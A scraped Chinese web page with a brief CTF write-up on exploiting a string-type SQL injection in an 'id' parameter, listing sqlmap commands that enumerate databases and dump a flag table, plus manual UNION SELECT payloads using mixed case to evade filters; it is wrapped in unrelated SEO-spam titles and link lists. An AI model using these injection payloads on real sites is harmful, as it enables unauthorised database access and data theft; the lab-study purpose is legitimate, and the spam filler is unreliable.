当前位置: 首页 > wzjs >正文

好看的网站首页设计亚马逊的免费网站

好看的网站首页设计,亚马逊的免费网站,济南做网站哪家公司好,织梦 网站首页题目: 发现id处可以sql注入: 虽然输入id1;show databases;#没什么回显,但是知道这里是字符型注入了 这次利用sqlmap注入 --dbs:列出所有数据库名字 python .\sqlmap.py -u http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.…

题目:

发现id处可以sql注入:

虽然输入id=1';show databases;#没什么回显,但是知道这里是字符型注入了

这次利用sqlmap注入

--dbs:列出所有数据库名字
python .\sqlmap.py -u 'http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.buuoj.cn:81/?id=1' --dbs

--current-db:当前数据库
python .\sqlmap.py -u 'http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.buuoj.cn:81/?id=1' --current-db

显示表名
python .\sqlmap.py -u 'http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.buuoj.cn:81/?id=1' -D 'ctf' --tables

--dump:显示文段内容
python .\sqlmap.py -u 'http://a40b2f0a-823f-4c99-b43c-08b94ed0abb2.node5.buuoj.cn:81/?id=1' -D 'ctf' -T 'here_is_flag' --dump

 其他手动SQL注入方法

利用大小写绕过

/?id=1' Order by 5 --+
/?id=1' Union SELect 1,version(),user(),database(),5  --+

?id=' uNion Select 1,2,3,4,GROUP_CONCAT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA= 'ctf'--+
?id=0' uNion Select 1,2,3,4,flag FROM ctf.here_is_flag--+
http://www.dtcms.com/wzjs/414648.html

相关文章:

  • 建设网站要做的工作内容上海热点新闻
  • 怎么做公司网站的手机客户端百度公司好进吗
  • 文山 砚山 网站建设免费seo排名网站
  • wordpress怎么保持缩略图尺寸不变海口网站关键词优化
  • 容桂网站制作价位郑州企业网站seo
  • 做网站意义电商卖货平台有哪些
  • 外贸推广代理seo是网络优化吗
  • 贸易做网站广告公司招聘
  • 大城怎么样做网站湖南网站网络推广哪家奿
  • 北京房地产最新消息淘宝关键词优化技巧教程
  • 美国纽约网站建设费用seo推广和百度推广的区别
  • 工程管理毕业设计代做网站公司网站制作公司
  • 网站制作主题企业软文
  • 建站技术分享java成品网站
  • 龙口市最新公告什么是关键词排名优化
  • 怎样做废旧网站免费广告投放网站
  • 北京专业网站建设公司哪家好免费信息发布平台网站
  • 网站制作视频教程下载什么是关键词推广
  • 品牌网站制作抖音seo代理
  • app网站的电话是什么seo快照推广
  • 如何做网站对话框学技术的培训学校
  • 广东企业网站建设公司成都移动seo
  • 在线a视频网站一级a做爰片国内seo排名分析主要针对百度
  • 网站开发日程安排百度搜索风云榜排名
  • 云速建站可以建个人网站吗发稿软文公司
  • 苏州网站建设2万起百度手机应用市场
  • 信仰类型的企业网站360营销
  • 广东建设信息网站首页宁波seo关键词
  • 重庆模板建站公司百度seo指数查询
  • 广州做网络服装的网站建设设计公司企业网站